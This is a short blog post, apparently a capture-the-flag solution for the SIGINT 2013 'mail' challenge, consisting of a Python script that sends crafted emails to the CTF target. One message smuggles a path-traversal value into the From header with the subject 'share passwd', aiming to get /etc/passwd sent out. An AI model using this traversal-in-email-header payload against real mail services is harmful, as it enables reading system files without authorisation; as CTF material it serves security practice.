Computer Security/CTF

[SIGINT 2013] mail exploit

tunz 2013. 7. 8. 01:04






import smtplib import sys   sender = 'hans@ck.er' receivers = ['test@b3.ctf.sigint.ccc.de']   if sys.argv[1] == "tunz": message = """From: ~~~~~~your email address~~~~~~ To: cloud <test@b3.ctf.sigint.ccc.de> Subject: get passwd   This is a test e-mail message. """ else: message = """From: /../../../../../../../etc@asdf.com To: cloud <test@b3.ctf.sigint.ccc.de> Subject: share passwd ~~~~~~your email address~~~~~~   This is a test e-mail message. """   print message     smtpObj = smtplib.SMTP('localhost') smtpObj.sendmail(sender, receivers, message) print "Successfully sent email"